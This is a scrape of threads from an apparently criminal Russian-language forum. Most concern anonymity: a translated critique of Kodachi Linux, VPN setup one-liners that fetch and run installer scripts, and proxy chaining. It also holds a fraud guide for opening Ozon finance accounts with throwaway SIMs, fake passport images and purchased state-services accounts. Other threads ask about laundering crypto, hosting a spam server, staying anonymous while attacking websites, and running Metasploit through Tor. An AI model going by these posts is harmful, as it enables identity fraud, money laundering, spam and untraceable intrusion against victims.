Это с другого компьютера в той же подсети. Какое возможное обоснование у этого решения? Это риск для безопасности. Нет ни одного значимого сценария, в котором это было бы необходимо на компьютере, используемом для анонимного подключения к Интернету. Это актуально только для сервера электронной почты.

Кроме того, Kodachi не блокирует трафик до того, как VPN сервисы начнут работу. А ведь должен! Брандмауэр, отбрасывающий входящие пакеты, также повышает безопасность на случай, если что-то прослушивается по ошибке - подумайте о глубокой защите. Сконфигурированный брандмауэр мог бы смягчить ситуацию с прослушиванием Postfix - хотя я ожидал, что автор лучше контролирует сконфигурированные службы, чем показывает.

Оценка безопасности

Kodachi выставляет оценки от 0 до 100, якобы для того, чтобы сообщить, насколько вы защищены. Проблема, в том, что на самом деле это ни о чем не говорит! Рассмотрим следующее:

Bash:Copy to clipboard

SERVICE='tor-service'; if (ps ax | grep -v grep | grep $SERVICE > /dev/null) then theModel="ISP->VPN->Tor"; securityScore=$((securityScore+30))

Kodachi не проверяет, действительно ли используется tor; достаточно того, что он запущен. Или как насчет брандмауэра?

Bash:Copy to clipboard

if(sudo ufw status |grep tun0 > /dev/null) then securityScore=$((securityScore+2)); fi

Будет плохо, если интерфейс переименуют в tun1. Также не проверяется разумность правил, а только то, что в каком-то правиле присутствует tun0. Разрешение "any from any" с указанием tun0 в качестве комментария повысит оценку.

В существующем виде это число в значительной степени бессмысленно. Безопасная система может набрать 0 баллов, а небезопасная 100. В лучшем случае это бесполезно. В худшем активно вредит, поскольку пользователь может быть введен в заблуждение хорошей оценкой.

Apparmor

Поскольку Kodachi основан на Ubuntu, он поставляется с Apparmor. К сожалению, он использует только профили по умолчанию, доступные в Ubuntu, без каких-либо адаптаций. Apparmor мог бы стать ценным элементом системы для глубокой защиты, гарантируя, что проблема в браузере не сможет скомпрометировать всю систему, например, ограничив браузер на чтение и запись в определенный набор каталогов. К сожалению, этого не сделано.

Discord для связи

Этот парень тусуется в чате Discord. Те люди, которых я знаю, которые более чувствительны к конфиденциальности, не тронут Discord и 10-футовым шестом. Отсутствие IRC канала кажется странным выбором - хотя это и не влияет на безопасность дистрибутива, но говорит о менталитете автора. Кроме того, очевидно, что это один автор, а не сообщество или группа людей.

Резюмируя

Вот что я обнаружил за несколько часов поисков. Некоторые из находок серьезны, некоторые просто указывают на небрежность создателя системы, что говорит о том, что он не обладает хорошими знаниями в области безопасности. Bash скрипты указывают на то, что человек не имеет опыта программирования и администрирования Linux, и содержат такие странные конструкции, как использование NetworkManager для получения списка устройств - но не использует NetworkManager для их конфигурирования, вызов dhclient для loopback интерфейса и т.д.

Многие из этих вариантов не повлияют на пользователя, заботящегося о безопасности, но позволят новичку сконфигурировать систему в небезопасном состоянии. Наличие большего выбора в данном случае по сути означает, что люди могут совершать больше ошибок. В Tails это понимают и обеспечивают безопасную базовую настройку, которую не так-то просто разрушить. Там, где Tails допускает небезопасную конфигурацию, документация ясно предупреждает об этом. Документация по Kodachi очень скудна как по содержанию, так и по предупреждениям.

Вероятно, я мог бы найти больше проблем, если бы потратил на поиск больше времени, но оно того не стоит. То, что я нашел, подрывает всякое доверие к автору, и совет - просто держаться от этого программного обеспечения подальше. Оно небезопасно, а автор не знает, как защитить систему.

Вкратце: не используйте Kodachi. Есть другие, которые лучше:

Tails

Whonix

Qubes

Они несколько отличаются по объему и функциональности. Прочитайте документацию и найдите тот, который подходит именно вам. Все они имеют активные сообщества. Но держитесь подальше от Kodachi.

**Специально дляXSS.is
Перевел: IvanVasilyevich
Автор статьи: vidarlo
Актуальность: 24 Октября, 2021
Оригинал: <https://bitsex.net/english/2021/kodachi-linux-is-probably-not- secure>**

OVPN Config, серверный с приватным скриптом

ID: 676533bbb4103b69df371c68
Thread ID: 45801
Created: 2020-12-21T09:02:43+0000
Last Post: 2020-12-21T09:02:43+0000
Author: Tubu
Replies: 0 Views: 762

Покупаете VPS под нужный штат/город далее смотрите видео.
1.Покупаем ВПН на Ubuntu 16.04
2.Соединяемся по ssh (в Windows через Putty) на видео делали через мак и терминал.
3.Вставляем скрипт в терминал где открыт наш сервер от root.
wget https://git.io/vpn1604 -O openvpn-install.sh && bash openvpn-install.sh
4.Следуем инструкциям как на видео. (порт меняем, главное чтобы был не стандартный)
5.Качаем ваш конфиг через Filezilla
6.Проверяем работоспособность.
7.Закрываем 22 порт.
Как закрыть 22 порт ? - https://firstwiki.ru/index.php/Как_поменять_(изменить)_порт_у_SSH_сервера

Если в кратце.
Через файл зилу на комп скинул себе с серва файл sshd_config
Через notepad++ заменил в нем port 22 на 2222
Обратно скинул - готово.

Дополнительно снести rsyslog и отправить логи самого openvpn в /dev/null
Для экономии оперативной памяти лучше ставить на debian, дешевле VPS обойдется

UPD: Что бы это работало, хостер не должен обрезать работу TUN/TAP на предоставляемой виртуалке. Не очень часто, но встречается на дешевых VPS

Раздачи - ключи активации, лицензии, proxy

ID: 676533bbb4103b69df371a00
Thread ID: 73935
Created: 2022-10-04T12:30:09+0000
Last Post: 2023-10-06T05:04:45+0000
Author: nd0bry
Replies: 12 Views: 760

Поделитесь ключем активации Proxifier MAC v3. Заранее спасибо.

how to be anonymous

ID: 676533bbb4103b69df371c0d
Thread ID: 50309
Created: 2021-04-05T15:40:46+0000
Last Post: 2021-04-06T20:21:58+0000
Author: Zakodowany
Replies: 6 Views: 757

Hello!

I have a question for each of you.

How to remain completely anonymous when attacking websites?
( I use Burp Suite, DirBuster e.t.c)

Thanks for the answers!

Радиоразведка России. Сборник разведданных. Вадим Гребенников

ID: 676533bbb4103b69df371b14
Thread ID: 66510
Created: 2022-05-03T07:12:04+0000
Last Post: 2022-05-03T09:42:00+0000
Author: camawe
Prefix: Мануал/Книга
Replies: 1 Views: 757

[ Радиоразведка России. Сборник разведданных. Вадим Гребенников.pdf -

AnonFiles ](https://anonfiles.com/J632A8cby4/.._pdf)

anonfiles.com

Вопрос к знатокам по VPN и SOCKS

ID: 676533bbb4103b69df371c3c
Thread ID: 46990
Created: 2021-01-19T15:08:42+0000
Last Post: 2021-02-17T13:33:16+0000
Author: juups
Replies: 3 Views: 753

Кто-то снес прошлую тему.
...

VPN (openvpn)

Что видит интернет-провайдер при использование VPN (openvpn) c AES-256?(например)?

Интернет-провайдер видит какие сайты посещались, и конкретно ссылки(которые открывались) при использование VPN c AES-256(например)?

Логи какие у него?(какого вида точнее)

Фиксируется ли факт подключения к VPN у интернет-провайдера?

---

Socks5

Что видит интернет-провайдер при использовании socks5?

Интернет-провайдер видит какие сайты посещались, и конкретно ссылки(которые открывались) при использовании socks5?

Какие логи при использовании socks5?

Фиксируется ли факт использования socks5 у интернет-провайдера?

Методическое руководство по извлечению данных из iPhone и других устройств Apple. Элкомсофт [2023] рус

ID: 676533bbb4103b69df37194c
Thread ID: 117779
Created: 2024-06-28T15:54:21+0000
Last Post: 2024-06-28T15:54:21+0000
Author: handersen
Prefix: Мануал/Книга
Replies: 0 Views: 748

В данном руководстве систематизирована информация по извлечению данных из iPhone и некоторых других устройств Apple, описаны подходы, стратегии и особенности разных методов, а также типичные ошибки.

Spoiler: Оглавление

1. Введение
2. С чего начать?
2.1. Определение модели устройства
2.1.1. Программный способ (рекомендуемый)
2.1.2. Идентификация модели по внешнему виду
2.1.3. Поиск номера модели устройства по маркировке
2.2. Специальные режимы: Diagnostic, Recovery и DFU
2.2.1. Способ 1: режим диагностики
2.2.2. Способ 2: режим Recovery
2.2.3. Способ 3: режим DFU
2.3. Блокировка экрана и биометрические датчики
2.4. Режимы S.O.S. и защитный режим USB
2.5. Риск удалённой блокировки устройства и уничтожения улик
2.6. Криминалистическая чистота извлечения
2.6.1. Что такое «криминалистически чистое» извлечение?
2.6.2. Целостность и неизменность пользовательских данных
2.6.3. Проверка целостности данных
2.6.4. Повторяемость результата
2.6.5. Достижима ли криминалистическая чистота извлечения в современных устройствах?
2.6.6. Краткий обзор методов извлечения данных
2.6.7. Криминалистическая чистота логического анализа
2.6.8. Криминалистическая чистота облачного анализа
2.6.9. Запрос облачных данных у производителя
2.6.10. Криминалистическая чистота при низкоуровневом извлечении
2.6.11. Как превратить улики в доказательства
2.7. Транспортировка: изолирование устройства от беспроводных сетей
2.7.1. Клетка Фарадея
2.7.2. Клетка Фарадея и полётный режим
2.8. Хранение устройства
2.9. Удастся ли извлечь данные?
2.10. Документирование
3. Последующие шаги
3.1. Для чего нужен и почему важен код блокировки экрана
3.2. Взлом пароля (кода блокировки экрана)
3.3. Методы извлечения и порядок их использования
3.4. Зависимость методов извлечения от аппаратной платформы и версии iOS
3.5. Методы, которые не работают
4. Методы извлечения данных
4.1. Расширенное логическое извлечение
4.1.1. Ограничения метода
4.1.2. Достоинства метода
4.2. Облачное извлечение
4.2.1. Ограничения метода
4.2.2. Достоинства метода
4.3. Низкоуровневое извлечение
4.3.1. Агент-экстрактор
4.3.2. Эксплойт загрузчика
4.4. Сравнение доступных данных
5. Извлечение данных: логическое извлечение
5.1. Что входит в состав расширенного логического извлечения
5.2. Сопряжение устройства с компьютером
5.2.1. Действия по сопряжению устройства с компьютером
5.3. Депонированные ключи (файлы lockdown)
5.3.1. Ограничения депонированных ключей
5.3.2. Пути к депонированным ключам
5.3.3. Использование депонированных ключей в Elcomsoft iOS Forensic Toolkit
5.4. Локальные резервные копии
5.4.1. Как создаются резервные копии iOS
5.4.2. Пароли к резервным копиям
5.4.3. С паролем или без?
5.4.4. Что делать, если пароль к резервной копии неизвестен
5.4.5. Сброс пароля к резервной копии: что для этого нужно, как проделать, последствия
5.4.6. Проблемы в процессе сброса пароля к резервной копии
5.4.7. Восстановление оригинального пароля в Elcomsoft Phone Breaker
5.5. Медиафайлы
5.6. Системные журналы
5.7. Данные приложений (shared files)
5.8. Шаги для логического извлечения данных
6. Извлечение данных: облачный анализ
6.1. Роль специализированного ПО в облачной криминалистике
6.2. Запрос данных у Apple
6.3. Преимущества и недостатки облачного анализа
6.3.1. Роль двухфакторной аутентификации
6.4. Доступные данные: типы контейнеров
6.4.1. Контейнер 1: резервные копии
6.4.2. Контейнер 2: синхронизированные данные
6.4.3. Контейнер 3: данные в iCloud Drive
6.4.4. Контейнер 4: сквозное шифрование
6.4.4.1. Пароль Экранного времени
6.4.5. Контейнер 5: неизвлекаемые данные
6.4.6. Advanced Data Protection в iCloud
6.5. Что нужно для извлечения через облако
6.6. Получение пароля к Apple ID и кода двухфакторной аутентификации
6.7. Облачное извлечение: пошаговая инструкция
6.8. Маркеры аутентификации
6.8.1. Ограничения
6.8.2. Извлечение
6.8.3. Авторизация с использованием маркеров аутентификации
7. Извлечение данных: низкоуровневый анализ
7.1. Способы низкоуровневого анализа и различия между ними
7.1.1. Агент-экстрактор
7.1.2. Джейлбрейк
7.1.3. Уязвимость загрузчика
7.2. Для чего нужен код блокировки экрана
7.3. Способ 1: использование агента-экстрактора
7.3.1. Совместимость и требования
7.3.2. Учётная запись Apple ID для установки сторонних приложений
7.3.3. Установка iOS Forensic Toolkit
7.3.4. Установка агента-экстрактора
7.3.5. Особенности установки агента-экстрактора
7.3.5.1. Риски при установке агента-экстрактора
7.3.5.2. Программа Apple для разработчиков
7.3.5.3. Ограничение на количество устройств
7.3.5.4. Снижение рисков при использовании обычных учётных записей
7.3.5.4.1. Способ 1: программный
7.3.5.4.2. Способ 2: с использованием Raspberry Pi
7.3.6. Использование агента
7.3.7. Последовательность шагов
7.4. Способ 2: эксплойт загрузчика для iPhone
7.4.1. Вводный раздел и теория
7.4.1.1. Определения
7.4.1.2. Преимущества iOS Forensic Toolkit
7.4.1.3. Принцип работы
7.4.1.4. Возможные действия с заблокированными устройствами
7.4.1.5. Поддержка iPhone 8, 8 Plus и iPhone X и iOS 16
7.4.1.6. Использование checkm8 для взлома кода блокировки
7.4.2. Как добиться повторяемого результата при использовании checkm8
7.4.2.1. Флаг автозагрузки
7.4.2.2. Нарушает ли изменение флага автозагрузки принцип криминалистической чистоты?
7.4.3. Глубокий разряд аккумулятора
7.4.4. Подготовка к работе
7.4.5. Ввод в режим DFU
7.4.6. Руководство по использованию iOS Forensic Toolkit 8.0
7.4.6.1. Установка iOS Forensic Toolkit 8.0 для Mac
7.4.6.2. Параметры командной строки
7.4.7. Извлечение через эксплойт загрузчика: обзорные инструкции
7.4.8. Извлечение через эксплойт загрузчика: подробные инструкции
7.4.8.1. iOS/iPadOS 16.1 и 16.2
7.4.9. Проблемы и решения
7.4.9.1. После извлечения через checkm8 устройство перезагружается в режим Recovery
7.4.9.2. Ошибка при попытке извлечения 32-разрядного устройства
7.4.9.3. Сброс кода блокировки экрана: применимость и риски
7.4.9.4. Невозможно перевести устройство в режим DFU
7.4.9.5. Несовпадение версии прошивки, ошибка автоматического определения версии
7.4.9.6. В выходных данных присутствует предупреждение 'Snapshot'
7.4.9.7. Повреждения файловой системы, проблемные файлы APFS 'copy-on-write'
7.4.9.8. Неизвестный код блокировки экрана
7.4.9.9. Индикация на экране устройства
7.5. Способ 2.1: эксплойт загрузчика и часы Apple Watch S0-S3
7.5.1. Адаптеры USB для часов Apple Watch
7.5.2. Совместимость
7.5.3. Подготовка к работе
7.5.4. Анализ данных
7.5.5. Apple Watch: извлечение данных через checkm8
7.5.6. Пошаговое руководство
7.6. Способ 2.2: эксплойт загрузчика и приставки Apple TV 3, Apple TV 4 (HD), Apple TV 4K
7.6.1. Apple TV: извлечение данных через эксплойт загрузчика
7.6.2. Перевод приставок Apple TV в режим DFU
7.6.2.1. Apple TV 3 (2012 и 2013)
7.6.2.2. Apple TV HD (4 поколение)
7.6.2.3. Apple TV 4K (2017)
7.7. Способ 2.3: эксплойт загрузчика и колонки HomePod
7.7.1. Подготовка к работе
7.7.2. Скрытый порт диагностики
7.7.3. Эксплуатация уязвимости checkm8
7.7.4. HomePod и checkm8: шпаргалка
7.7.5. Перевод колонки HomePod в режим DFU
7.7.6. Извлечение данных из HomePod: последовательность шагов
7.8. Способ 3: использование джейлбрейка
7.8.1. Сопутствующие риски
7.8.2. В каких случаях имеет смысл использовать джейлбрейк
7.8.3. Извлечение данных с использованием джейлбрейка
7.8.4. Возможные проблемы
8. Устаревшие устройства: 32-разрядные модели без Secure Enclave
8.1. Шпаргалка: извлечение данных из 32-разрядных устройств
8.2. Извлечение данных и подбор кода блокировки
8.2.1. Флаг автозагрузки
8.2.2. Ввод устройства в режим DFU
8.2.3. Создание образа пользовательского раздела
8.2.4. Получение BFU ключей
8.2.5. Получение полного набора ключей шифрования
8.2.5.1. Извлечение файла systembag.kb
8.2.5.2. Подбор кода блокировки экрана
8.2.5.3. Получение полного набора ключей шифрования
8.2.6. Расшифровка образа диска
8.2.7. Извлечение связки ключей
8.2.8. Окончание работы с устройством
9. iPhone 4s
9.1. Сборка микроконтроллера Pico
9.1.1. Подробнее об источнике питания
9.1.2. Прошивка микроконтроллера Pico
9.1.3. Дальнейшие действия
9.1.4. Особенности установки эксплойта
9.1.5. Дальнейшие действия
10. Просмотр и анализ данных
10.1. Источники данных
10.2. Информация об устройстве, список установленных приложений
10.3. Бесплатные утилиты
10.4. Наборы скриптов
11. Вопросы и ответы
12. iOS Forensic Toolkit: полезные команды и примеры использования
12.1. Команды, выполняющиеся из режима восстановления (recovery)
12.2. Команды, выполняющиеся из режима pwnedDFU
12.3. Команды для устройств, загруженных в ОС
13. Дополнительные материалы
13.1. Сравнение редакций iOS Forensic Toolkit: Windows, Linux, macOS
13.2. Дополнительное оборудование для iOS Forensic Toolkit
13.2.1. Программный продукт: Elcomsoft iOS Forensic Toolkit
13.2.2. Компьютер Mac
13.2.3. Raspberry Pi Pico
13.2.4. Raspberry Pi 3/4
13.2.5. Кабели
13.2.6. Адаптеры
13.2.7. Дополнительные и необязательные аксессуары
13.3. Список соответствия идентификаторов моделей Apple
13.4. Эволюция системы безопасности в версиях iOS
13.5. Аппаратный ввод в режим DFU: когда не работают кнопки
13.6. Использование USB хабов для повышения стабильности работы checkm8/checkra1n с компьютерами на Apple Silicon
13.7. Использование обычной учётной записи для подписи агента-экстрактора
13.8. Raspberry Pi Pico: функции автоматизации
13.8.1. Автоматический ввод в DFU
13.8.1.1. Подготовка к работе
13.8.1.2. Ввод в DFU
13.8.1.3. Информация об авторском праве
13.8.2. Длинные скриншоты (скриншоты с прокруткой)
13.8.2.1. Настройка Raspberry Pi Pico
13.8.2.2. Особенности и решение проблем
13.8.2.3. Экспериментальный статус
13.9. Raspberry Pi 3/4: функциональный файрволл для безопасной установки агента-экстрактора
13.9.1. Дополнительное оборудование
13.9.2. Инструкции по установке прошивки на Raspberry Pi
13.10. Orange Pi R1 Plus LTS: функциональный файрволл для безопасной установки агента-экстрактора
13.10.1. Дополнительное оборудование
13.10.2. Инструкции по установке прошивки на Orange Pi R1 Plus LTS
14. Список литературы

Скачать с libgen
или с DamageLiB

Анонимный VPS провайдер с возможностью установки rDNS (PTR record)

ID: 676533bbb4103b69df371918
Thread ID: 124187
Created: 2024-10-06T00:10:19+0000
Last Post: 2024-10-21T15:05:24+0000
Author: paulmuller
Replies: 1 Views: 747

Нашел только bitlaunch.io. Что скажите, если пользовали? Надежность, удобство?
Какая алтернатива ему?
Ищу инфраструктуру для своего сspam smtp server

Как проверить что крипта "белая"?

ID: 676533bbb4103b69df371b2c
Thread ID: 65033
Created: 2022-03-30T20:32:04+0000
Last Post: 2022-03-30T22:13:57+0000
Author: chillco
Replies: 4 Views: 747

Здравствуйте. Неоднократно видел на этом и других форумах сообщения о том, что люди используют разные схемы и сервисы для получения из "грязной" крипты "чистую" или "белую". Возникло пару вопросов об этом.
1. Как проверить "чистая" ли крипта на определенном биткоин адресе(или другой криптовалюты)?
2. Как это может проверить биржа или обменник, которому мы отправляем эту крипту и какую информацию о происхождении крипты получает биржа/обменник?
3. Что будет, если обменять грязную крипту через обменник себе на карту? Риск в том, что обменник куда то настучит, или в том что не скрыто происхождение крипты и в случае следствия найдут откуда крипта?
4. Достаточно ли прогнать крипту через, например, монеро?
Станет ли крипта "чистой"? Если нет, почему и чем грозит?

Заранее спасибо!

D2W OS, обсуждение

ID: 676533bbb4103b69df3719a3
Thread ID: 103845
Created: 2023-12-10T18:44:44+0000
Last Post: 2024-02-16T13:14:19+0000
Author: testerov
Replies: 14 Views: 743

Доброго времени суток дорогие форумчане, в очередном серфинге по интернету обнаружил кое что интересное **

https://web-2.gate2dark.top/threads/162730/

данный пост подразумивает из себя анонимную и безопасную операционную систему линукс которая была собрана и презентована автритетнейшим форумом и людьми dark2web,
кто протестит напишите сюда будет интересно почитать) в друг что скачивайте на свой страх и риск ! Удачи ...

обзор на ютуб:

**

сервак под RDP

ID: 676533bbb4103b69df371c8b
Thread ID: 43619
Created: 2020-10-28T11:17:03+0000
Last Post: 2020-10-28T11:17:03+0000
Author: hackerman_228
Replies: 0 Views: 742

Подскажите, у кого берете серваки под RDP? Кто по опыту посоветует хорошего хостера с адекватными ценами и без лишних заморочек.

Технология работы с пластиковыми картами и защита информации

ID: 676533bbb4103b69df371b43
Thread ID: 62792
Created: 2022-02-11T09:26:57+0000
Last Post: 2022-02-17T06:15:55+0000
Author: camawe
Prefix: Мануал/Книга
Replies: 1 Views: 740

Технология работы с пластиковыми картами и защита информации

[ Bank_System_Card_Security.pdf - AnonFiles

](https://anonfiles.com/h393qfHcx9/Bank_System_Card_Security_pdf)

anonfiles.com

Поднимаем свой WireGuard / OpenVPN сервер за 1 минуту

ID: 676533bbb4103b69df371a71
Thread ID: 85696
Created: 2023-04-11T17:37:59+0000
Last Post: 2023-04-12T09:59:56+0000
Author: baykal
Prefix: Статья
Replies: 3 Views: 739

Многие советуют использовать двойной и более впн, я сейчас вам покажу как это делается очень быстро и просто.

Покупаем дешевый впс, ищем на lowendtalk там их много (за крипту, 1-5 баксов).

Ставим debian 10.

Нужен WireGuard? Делаем так

Code:Copy to clipboard

wget https://git.io/wireguard -O wireguard-install.sh && bash wireguard-install.sh

репозиторий тут

Code:Copy to clipboard

https://github.com/Nyr/wireguard-install

Нужен OpenVPN? Да как нехуй делать.

Code:Copy to clipboard

curl -O https://raw.githubusercontent.com/angristan/openvpn-install/master/openvpn-install.sh chmod +x openvpn-install.sh; ./openvpn-install.sh

репозиторий тут

Code:Copy to clipboard

https://github.com/angristan/openvpn-install

Ок. поставили впн, скачали конфиг. Збс. как сделать двойной впн?

Очень просто.

Качаем bitvise ssh client (можно putty, но я привык к bitvise )

Добавляем любой ssh сервер, чистый, не надо там ничего ставить.

На вкладке Services включаем локально socks и указываем порт.

Подключаемся к ssh. НЕ К ТОМУ НА КОТОРОМ ВЫ ПОСТАВИЛИ WIREGUARD/OPENVPN, А НА ДРУГОЙ

Далее, качаем proxifier https://www.proxifier.com/

(ключи активации 1 минута в гугле)

Добавляем наш локальный сокс и указываем резолвить DNS через него.

Там все очень просто, разберетесь, главное указать чтобы весь ваш софт работал только через проксифир.

Таким образом вы во первых, сделали свой впн, и используя проксифир сделали двойной впн и kill-switch (в случае обрыва связи никакой трафик никуда не уйдет).

Таким же образом в прокифир вы можете использовать любые соксы без поднятия ssh соединения через битвайс, если у вас есть уже готовые соксы\прокси, можете сразу использовать их.

Всем добра и позитива!

автор cr33p
источник exploit.in

Free Proxy LIST

ID: 676533bbb4103b69df371caf
Thread ID: 40766
Created: 2020-08-11T09:27:10+0000
Last Post: 2020-08-11T09:27:10+0000
Author: Fireman112
Replies: 0 Views: 739

***Актуальность 11,08,2020
**Anonymity: Elite, Anonymous, Transparent
***Not Checked
****All world IP

All: 548
Elite: 287
Anon: 19
Transparent: 242

URL PASSED: 141**

Digital Forensic Analysis of Telegram Messenger on Android Devices

ID: 676533bbb4103b69df371cb5
Thread ID: 40265
Created: 2020-07-31T18:23:09+0000
Last Post: 2020-07-31T18:23:09+0000
Author: tabac
Prefix: Мануал/Книга
Replies: 0 Views: 739

Digital Forensic Analysis of Telegram Messenger on Android Devices

Небольшая статья с картинками. что остается в телеграме, если телефон на экспертизе. К сожалению, на английском. Но очень интересно.

Hidden content for authorized users.

![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)

[ 401 KB file on MEGA

](https://mega.nz/file/coIF0SSb#5tV28mpwxXNa3A-S0bPbAvrhChAm9B_vSPYp2BlSC7s)

mega.nz

Ozon VCC

ID: 676533bbb4103b69df3719ac
Thread ID: 96398
Created: 2023-08-23T16:34:55+0000
Last Post: 2024-02-08T18:43:16+0000
Author: Knew100
Prefix: Статья
Replies: 3 Views: 739

Идем на 5sim, регаем аккаунт ozon.ru на временную симку.
Далее создаем озон счет https://finance.ozon.ru/
Без верификации вы можете принять деньги на баланс ozon счет и оплатить ими покупки.
С верификацией вы уже получаете возможность переводить деньги по номеру телефона другим людям (ну и себе любимому офк)
Верификация в разы проще чем с киви, я брал рандом паспорта я яндекс картинок, все жрет без проблем. Лимит 60к в месяц. Вывод идет без СМС а по пин-коду который вы 1 раз задаете, и при любой операции (покупка, перевод) его снова и снова вводите.
Верификация через гос. услуги. достаточно просто авторизации. гос услуги можете купить у типов кто занимается логами. года 2 назад они стоили по 20 руб

Важный момент, если вы используете временную симку где вам дается всего 15 минут, то если вас выкинет с аккаунта вы уже на него не зайдете, тем самым проебете деньги.
Используйте эмуляторы андроида (Nox, BluseStack) т.к. с приложений на мобилках меня никогда не выкидывало. Либо же надо иметь на руках физическую симку, чтоб в случае чего принять смску

Полезный инструмент который использую не первый день, когда не хочется светить лишний раз свой номер на Р2Р или еще где-либо

Радиус определения 4G-модема

ID: 676533bbb4103b69df371c35
Thread ID: 48408
Created: 2021-02-20T18:45:45+0000
Last Post: 2021-02-21T18:16:12+0000
Author: Shelby
Replies: 2 Views: 737

Пример:

Есть проект в TOR-сети.

Связка следующая:
Реал.комп с 4G модемом и VPN --> Виртуалка VMware с TOR-сервером на борту, где лежит проект доступный только по onion-адресу.

Вопрос:
Как быстро найдут реал.комп с проектом?
И в каком радиусе определяется нахождение 4G модема: 1м., 10м., 100м., 200м., 500м. или др.?

VirtualBox, идентификаторы железа, ОС

ID: 676533bbb4103b69df371976
Thread ID: 112524
Created: 2024-04-12T14:40:16+0000
Last Post: 2024-05-03T07:21:31+0000
Author: Bin5
Replies: 5 Views: 736

Меня фродит одно приложение и не получается залогиниться в нём. Если создавать новые виртуальные машины Windows из одного и того же .iso образа, то каждая новая виртуальная машина будет уникальной по всем идентификаторам?

Строим прокси цепочку с помощью graftcp

ID: 676533bbb4103b69df371953
Thread ID: 116708
Created: 2024-06-12T21:36:40+0000
Last Post: 2024-06-12T21:36:40+0000
Author: tabac
Prefix: Статья
Replies: 0 Views: 735

Для проксирования обычно используют SOCKS или HTTP прокси. Сетевой протокол сеансового уровня SOCKS позволяет пересылать пакеты от клиента к серверу через прокси-сервер прозрачно (незаметно для них) и таким образом использовать сервисы за межсетевыми экранами.

Клиенты за межсетевым экраном, нуждающиеся в доступе к внешним серверам, могут быть соединены с SOCKS-прокси-сервером. Такой прокси-сервер позволяет клиенту подключаться к внешним ресурсам. SOCKS может использоваться и противоположным способом, осуществляя управление правами внешних клиентов при соединении с внутренними серверами, находящимися за межсетевым экраном.

В отличие от HTTP-прокси-серверов, SOCKS передаёт все данные от клиента, ничего не добавляя от себя, то есть, с точки зрения конечного сервера, данные, полученные им от SOCKS-прокси, идентичны данным, которые клиент передал бы напрямую, без проксирования. SOCKS более универсален, он не зависит от конкретных протоколов уровня приложений и оперирует на уровне TCP-соединений. Зато HTTP-прокси кэширует данные и может более тщательно фильтровать содержимое передаваемых данных.

Таким образом, мы можем использовать для обхода сетевых ограничений как SOCKS так и HTTP прокси.

Утилита graftcp

Существует множество различных инструментов, предназначенных для перенаправления трафика и проксирования. Утилита graftcp может перенаправлять TCP-соединение, установленное клиентской программой (браузером, приложением, скриптом, оболочкой и т.д.), на SOCKS5 или HTTP-прокси.

В отличии от других аналогичных утилит, таких как tsocks или proxychains, graftcp не использует взаимодействие с переменной окружения LD_PRELOAD, применение которой позволяет загрузить вашу библиотеку до загрузки остальных. Однако, данный трюк работает только для динамически подключаемых программ, и к примеру, приложения, созданные с помощью Go, не могут быть подключены с помощью proxychains-ng. Утилита graftcp лишена этих недостатков и может отслеживать или изменять подключение любой конкретной программы с помощью системного вызова ptrace, поэтому ее можно использовать совместно с любым клиентским приложением.

Принцип работы

Итак, наша основная цель это перенаправление TCP-соединения приложения на другой адрес назначения, о котором само приложение не знает, то есть прозрачно для клиента.

Выполнить это мы можем запустив новый процесс и отследив его запуск с помощью системных вызовов ptrace и execve. В процессе работы приложение будет осуществлять системные вызовы connect, каждый из которых будет перехвачен, и из него будет извлечен аргумент адреса назначения и передан в graftcp-local через pipe.

Далее уже graftcp-local изменит аргумент адреса назначения в параметре connect на нужный адрес и перезапустит остановленный системный вызов. После успешного завершения системного вызова приложение будет считать, что успешно подключило исходный адрес назначения, но на самом деле оно подключено к адресу, подставленному graftcp-local.

Далее graftcp-local устанавливает соединение с SOCKS5 на основе информации об исходном адресе назначения приложения, затем перенаправляет запросы из приложения на прокси-сервер SOCKS5.

Может показаться, что проще изменять информацию об адресе назначения непосредственно в буфере данных. Однако по факту это может привести к переполнению буфера при модификации. И кроме того, поскольку системный вызов execve отсоединяет и размонтирует всю общую память, мы также не можем добавить дополнительные данные в буфер записи отслеживаемого приложения, используя общую память, поэтому мы отправляем исходный адрес назначения через pipe.

Более-менее разобравшись с тем, как работает утилита graftcp-local давайте рассмотрим ее установку и настройку для использования.

Установка

Прежде всего нам потребуется установленный Go. В случае, если он у вас еще не установлен выполните следующие действия:

Code:Copy to clipboard

sudo apt update sudo apt install golang-go

Далее можно переходить к установке самого средства проксирования:

Code:Copy to clipboard

git clone https://github.com/hmgle/graftcp.git cd graftcp make

После завершения установки вы сможете использовать инструменты local/graftcp- local и ./graftcp. При желании их также можно прописать в загрузку системы:

Code:Copy to clipboard

sudo make install # Install systemed unit sudo make install_systemd # Activate systemd service sudo make enable_systemd

В случае проблем с установкой, можно также установить из готовых двоичных файлов, которые можно загрузить из репозитория проекта https://github.com/hmgle/graftcp/releases.

Настройка

Нашими основными инструментами будут утилиты graftcp, graftcp-local и mgraftcp. Они ищут конфигурационные файлы, указанные в качестве аргумента с параметром –config. Также, мы можем указать $(путь к исполняемому файлу)/graftcp-local.conf или же /etc/graftcp-local/graftcp-local.conf. Примеры конфигурационных файлов можно найти в том каталоге, куда установлена утилита.

Предположим, вы используете прокси-сервер SOCKS5 с IP-адресом по умолчанию: "localhost:1080". Сначала запустите graftcp-local:

Code:Copy to clipboard

local/graftcp-local

Далее установим пакет Go

Code:Copy to clipboard

./graftcp go get -v golang.org/x/net/proxy

Далее откройте браузер через graftcp, и все запросы из этого браузера будут перенаправляться на прокси-сервер SOCKS5:

Code:Copy to clipboard

./graftcp chromium-browser

Также можно использовать Bash для подключения через прокси:

Code:Copy to clipboard

% ./graftcp bash $ wget https://www.google.com

Автор Andrey_Biryukov

неработает метасплойт через тор, решения

ID: 676533bbb4103b69df371c4c
Thread ID: 47499
Created: 2021-02-01T17:23:14+0000
Last Post: 2021-02-01T19:40:48+0000
Author: XLino
Replies: 3 Views: 735

нашёл пару вариантов, интересует вашно мнение - что изпользовать:

Bash:Copy to clipboard

add this in proxychains.conf: localnet 127.0.0.1 000 255.255.255.255 Run the following command in Console: proxychains msfconsole

или через socat:

Bash:Copy to clipboard

ocat TCP4-LISTEN:3333,fork SOCKS4a:127.0.0.1:192.168.1.5:80,socksport=9050

onion v2 vs v3

ID: 676533bbb4103b69df371c44
Thread ID: 47106
Created: 2021-01-22T15:45:34+0000
Last Post: 2021-02-12T19:02:12+0000
Author: fraysi
Replies: 8 Views: 735

Изучаю Тор, дошел до генерации onion доменов v2 и v3, так и не понял в чем отличие кроме длины символов в имени. К примеру xsstorweb56srs3a это v2, v3 будет длинее. Чем на практике v3 лучше?

